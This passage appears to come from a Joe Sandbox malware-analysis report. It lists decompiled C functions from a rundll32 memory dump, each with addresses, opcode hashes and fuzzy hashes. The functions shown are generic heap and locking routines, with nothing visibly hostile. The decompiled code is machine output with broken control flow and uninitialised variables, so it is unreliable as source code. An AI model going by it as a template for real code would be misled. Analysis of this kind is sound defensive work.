                                                                                                                			E0442746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0441EB70(__ecx, 0x44f79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E044495D0();
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                0x0442746d
                                                                                                                0x0442746d
                                                                                                                0x0442746d
                                                                                                                0x04427471
                                                                                                                0x04427488
                                                                                                                0x0446f92d
                                                                                                                0x0442748e
                                                                                                                0x04427491
                                                                                                                0x04427495
                                                                                                                0x0446f937
                                                                                                                0x0446f93a
                                                                                                                0x0446f94e
                                                                                                                0x0446f953
                                                                                                                0x0446f956
                                                                                                                0x0446f956
                                                                                                                0x04427495
                                                                                                                0x00000000
                                                                                                                0x04427488
                                                                                                                0x04427473
                                                                                                                0x04427478
                                                                                                                0x0442747d
                                                                                                                0x04427481
                                                                                                                0x00000000
                                                                                                                0x04427481
                                                                                                                0x0442747d
                                                                                                                0x0442747a
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6e541f6e2a7d103ddd00959d4de16914cba928fbab1ae64014efcea458c9feb
                                                                                                                • Instruction ID: 4924ab76c1105da47210183935da9e45ef1313c859c821018c4bf63ff3651335
                                                                                                                • Opcode Fuzzy Hash: b6e541f6e2a7d103ddd00959d4de16914cba928fbab1ae64014efcea458c9feb
                                                                                                                • Instruction Fuzzy Hash: 1AF0E935A44964EAEF119F78CA41F7A7F71AF04318F94029BD891A7261F764B801C786
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 36%
                                                                                                                			E044D8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x44fd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04427D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0444B640(E04449AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                0x044d8ce5
                                                                                                                0x044d8ced
                                                                                                                0x044d8cf0
                                                                                                                0x044d8cfb
                                                                                                                0x044d8d0d
                                                                                                                0x044d8cfd
                                                                                                                0x044d8d06
                                                                                                                0x044d8d06
                                                                                                                0x044d8d18
                                                                                                                0x044d8d19
                                                                                                                0x044d8d1b
                                                                                                                0x044d8d20
                                                                                                                0x044d8d33

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25fd506cc87c232d95556f093af95cdbe1e2fa49f2126c745804e953d1e07c4b
                                                                                                                • Instruction ID: de756aafe434b11d894f5ca8fbcde5d2ec7857c5f70defa6eb282f14fc59c5a7
                                                                                                                • Opcode Fuzzy Hash: 25fd506cc87c232d95556f093af95cdbe1e2fa49f2126c745804e953d1e07c4b
                                                                                                                • Instruction Fuzzy Hash: 11F08970A041489BEF04EBB9D955E6E77B4EF44304F50015AF516EB3C1E934E900D754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04404F2E Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04404F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E044D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0442C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x43e1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                0x04404f2e
                                                                                                                0x04404f34
                                                                                                                0x04404f38
                                                                                                                0x04460b85
                                                                                                                0x04460b85
                                                                                                                0x04460b89
                                                                                                                0x04460b9a
                                                                                                                0x04460b9a
                                                                                                                0x04460b9f
                                                                                                                0x00000000
                                                                                                                0x04460b9f
                                                                                                                0x04460b94
                                                                                                                0x04460b98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04460b98
                                                                                                                0x04404f3e
                                                                                                                0x04404f48
                                                                                                                0x00000000
                                                                                                                0x04404f6e
                                                                                                                0x00000000
                                                                                                                0x04404f70

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 42ca5c3e32fb2bc743d5fc94361ca0eff2d76472ab5d8e5a982fc25b3fcb0e3d
                                                                                                                • Instruction ID: 5de9eb1eb346ad8922ed2148f3bb05c9a83ba8929032f3efd1e517d54033db3b
                                                                                                                • Opcode Fuzzy Hash: 42ca5c3e32fb2bc743d5fc94361ca0eff2d76472ab5d8e5a982fc25b3fcb0e3d
                                                                                                                • Instruction Fuzzy Hash: C4F0BE329266A48FEF71DB98C180B27B7D8AB01BB8F449477D40787A22C734FC80C646
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8B58 Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 36%
                                                                                                                			E044D8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x44fd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04427D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0444B640(E04449AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                0x044d8b67
                                                                                                                0x044d8b6f
                                                                                                                0x044d8b72
                                                                                                                0x044d8b7d
                                                                                                                0x044d8b8f
                                                                                                                0x044d8b7f
                                                                                                                0x044d8b88
                                                                                                                0x044d8b88
                                                                                                                0x044d8b9a
                                                                                                                0x044d8b9b
                                                                                                                0x044d8b9d
                                                                                                                0x044d8ba2
                                                                                                                0x044d8bb5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9c8dc7ca803ecc60d12758df137d271563803c02bc96f30c40dc1970ba7dad1b
                                                                                                                • Instruction ID: 72c5b4d8ee1b9d7be3abdd06847bdf1453d2e6905e25e7e57a2ac919cadc476a
                                                                                                                • Opcode Fuzzy Hash: 9c8dc7ca803ecc60d12758df137d271563803c02bc96f30c40dc1970ba7dad1b
                                                                                                                • Instruction Fuzzy Hash: B5F089B0A142589BEF10EBB5D916E7F77B4EF44304F44045AB915DB3C1EA34E900C754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443A44B Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x44f7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0444FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                                0x0443a44b
                                                                                                                0x0443a453
                                                                                                                0x0443a472
                                                                                                                0x0443a476
                                                                                                                0x00000000
                                                                                                                0x0443a493
                                                                                                                0x0443a47a
                                                                                                                0x0443a47f
                                                                                                                0x0443a486
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc0c71d65710e26130fb1fa94f6e96f739a39a6692ffcf52972f797287087bf9
                                                                                                                • Instruction ID: 14772a6cbd8873446e356dadb3134322b376ef96d5edc1f7ec8a154e22e390cc
                                                                                                                • Opcode Fuzzy Hash: cc0c71d65710e26130fb1fa94f6e96f739a39a6692ffcf52972f797287087bf9
                                                                                                                • Instruction Fuzzy Hash: 85E02272A41420ABE621CB08AC00F6773ADDBE4A05F09003AE544D7210DA28ED02C7E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440F358 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E0440F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0443F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04424620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                0x0440f35d
                                                                                                                0x0440f361
                                                                                                                0x0440f367
                                                                                                                0x0440f372
                                                                                                                0x0440f38c
                                                                                                                0x0440f38c
                                                                                                                0x0440f394

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                • Instruction ID: 4ad3a618d4e58cde293be4e64f154326389f5b5b1107aa82ae81fefeb52b9943
                                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                • Instruction Fuzzy Hash: F1E0D832A40218BBDF3196D99E05F5BBBACDB48B61F004166FD04D7190D974AE10C6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441FF60 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x43e11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E044D88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04420050(_t14);
				}
			}










                                                                                                                0x0441ff66
                                                                                                                0x0441ff6b
                                                                                                                0x00000000
                                                                                                                0x0441ff8f
                                                                                                                0x00000000
                                                                                                                0x0441ff8f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3381d67e85b6f536a12a512d32d550f3b82b4bbe20c169cf8fa2e231506332f
                                                                                                                • Instruction ID: 666534d5e2e1775dfa18bbe04808cde65c9806b484ca00701b2aa1b0535f8be2
                                                                                                                • Opcode Fuzzy Hash: e3381d67e85b6f536a12a512d32d550f3b82b4bbe20c169cf8fa2e231506332f
                                                                                                                • Instruction Fuzzy Hash: 50E0DFB02092059FEF34DB52D150F2A3B98BB4272DF19801FF00A4BA22C662F886C206
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044941E8 Relevance: .0, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E044941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x44e08f0);
				_t5 = E0445D08C(__ebx, __edi, __esi);
				if( *0x44f87ec == 0) {
					E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x44f87ec == 0) {
						 *0x44f87f0 = 0x44f87ec;
						 *0x44f87ec = 0x44f87ec;
						 *0x44f87e8 = 0x44f87e4;
						 *0x44f87e4 = 0x44f87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04494248();
				}
				return E0445D0D1(_t5);
			}





                                                                                                                0x044941e8
                                                                                                                0x044941ea
                                                                                                                0x044941ef
                                                                                                                0x044941fb
                                                                                                                0x04494206
                                                                                                                0x0449420b
                                                                                                                0x04494216
                                                                                                                0x0449421d
                                                                                                                0x04494222
                                                                                                                0x0449422c
                                                                                                                0x04494231
                                                                                                                0x04494231
                                                                                                                0x04494236
                                                                                                                0x0449423d
                                                                                                                0x0449423d
                                                                                                                0x04494247

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b97b61d4213df67838bf219cedf0274b91c65e62f5fe70aed7f4bf41fd68859
                                                                                                                • Instruction ID: fec3a2d2c30b15d9b501d392e79e8c98dd0df6d88b816e8e142b76da68715797
                                                                                                                • Opcode Fuzzy Hash: 0b97b61d4213df67838bf219cedf0274b91c65e62f5fe70aed7f4bf41fd68859
                                                                                                                • Instruction Fuzzy Hash: FAF0F278911B009EFFA0FFABE900714BAE4FB44769F10812B81008A296C7786892DF01
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044BD380 Relevance: .0, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044BD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0440E8B0(__ecx, _a4, 0xfff);
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                0x044bd38a
                                                                                                                0x044bd39b
                                                                                                                0x044bd3b1
                                                                                                                0x00000000
                                                                                                                0x044bd3b6
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                • Instruction ID: 058483362d98e5d2dd368c5713b68e1cba6046f8f86284e248d1fd784ab229a7
                                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                • Instruction Fuzzy Hash: 66E08631240614A7EF215E44CC00BA576159B50794F104036BD445A691C975BC61D6D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443A185 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x44f67e4 >= 0xa) {
					if(_t5 < 0x44f6800 || _t5 >= 0x44f6900) {
						return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04420010(0x44f67e0, _t5);
				}
			}





                                                                                                                0x0443a190
                                                                                                                0x0443a1a6
                                                                                                                0x0443a1c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443a192
                                                                                                                0x0443a192
                                                                                                                0x0443a19f
                                                                                                                0x0443a19f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8a07114ea556efce29931e2335c5967915c3110fa979e4eee16cf13ca62911e1
                                                                                                                • Instruction ID: 7b23c70f5854d6537f225fb0faed6c44ff65258afa40d8dad3a8bf0054efbaff
                                                                                                                • Opcode Fuzzy Hash: 8a07114ea556efce29931e2335c5967915c3110fa979e4eee16cf13ca62911e1
                                                                                                                • Instruction Fuzzy Hash: EED02B211A140026FE1C5711AF18F216252E7C8B1AF310C0FF3432B994DB58FCD68108
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044316E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044316E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04431710(0x44f67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04424620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                0x044316e8
                                                                                                                0x044316ef
                                                                                                                0x044316f3
                                                                                                                0x044316fe
                                                                                                                0x00000000
                                                                                                                0x04431700
                                                                                                                0x0443170d
                                                                                                                0x0443170d
                                                                                                                0x044316f2
                                                                                                                0x044316f2
                                                                                                                0x044316f2
                                                                                                                0x044316f2

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c18922e1a56febf6cc9f44d0b7fa6c9e53ece4ec331c9a6ee0fdc6681f41adf5
                                                                                                                • Instruction ID: 62149692f6435f57e6e1446b26045fffafb6c41dddb33fbb4cbd6ba06faca585
                                                                                                                • Opcode Fuzzy Hash: c18922e1a56febf6cc9f44d0b7fa6c9e53ece4ec331c9a6ee0fdc6681f41adf5
                                                                                                                • Instruction Fuzzy Hash: 53D0A73110010053FE2D5B129C04B153251DBC4F8AF38006EF207599C1CFA4FD92E448
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044853CA Relevance: .0, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044853CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0441EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                                0x044853ca
                                                                                                                0x044853ce
                                                                                                                0x044853d9
                                                                                                                0x044853de
                                                                                                                0x044853e1
                                                                                                                0x044853e1
                                                                                                                0x044853e6
                                                                                                                0x044853f3
                                                                                                                0x00000000
                                                                                                                0x044853f8
                                                                                                                0x044853fb

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                • Instruction ID: 9352604107ee3eb8ce8d85b79adc26e0ac6443a2de3ee9051fa54014b946e5b9
                                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                • Instruction Fuzzy Hash: B9E0EC75944684ABDF12EB59C650F5EB7F5FB84B40F550459A4085B761CA74BD00CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044335A1 Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044335A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0441EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                0x044335a1
                                                                                                                0x044335a1
                                                                                                                0x044335a5
                                                                                                                0x044335ab
                                                                                                                0x044335ab
                                                                                                                0x044335b5
                                                                                                                0x00000000
                                                                                                                0x044335c1
                                                                                                                0x044335b7

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                • Instruction ID: cf4f318f9e0f7339ca6155187d0b75c475078701dd594d20ccfa1b02bc4eff8f
                                                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                • Instruction Fuzzy Hash: FBD0C735551184D9DF51EF50C1147697771BB04B1AF5810DB9C4605652C335695AD601
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441AAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                Download Yara Rule
